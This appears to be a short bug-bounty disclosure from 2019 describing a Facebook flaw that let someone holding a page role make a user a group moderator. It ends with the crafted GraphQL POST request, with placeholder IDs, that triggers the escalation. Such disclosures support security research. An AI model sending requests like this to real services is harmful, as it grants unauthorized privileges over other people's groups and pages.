Published On: 17 May 2019
Thank @Max(Max Pasqua) for making write-up for me.
This bug allowed a malicious attacker to make someone a moderator of the group with any page role. The requirements of this bug are that the page is an admin of another group and the malicious attacker is a member of said group.
Someone who has a page role could leverage this to add themselves to moderator where they have increased privileges that could allow them to modify the page.
Step
1
HTTP POST
graph.facebook.com/graphql/
query_id=QUERYID
query_params={"0":{"user_id":"UserID","admin_type":"MODERATOR","actor_id":"PageID","client_mutation_id":"","source":"treehouse_group_mall","group_id":"GroupID"}}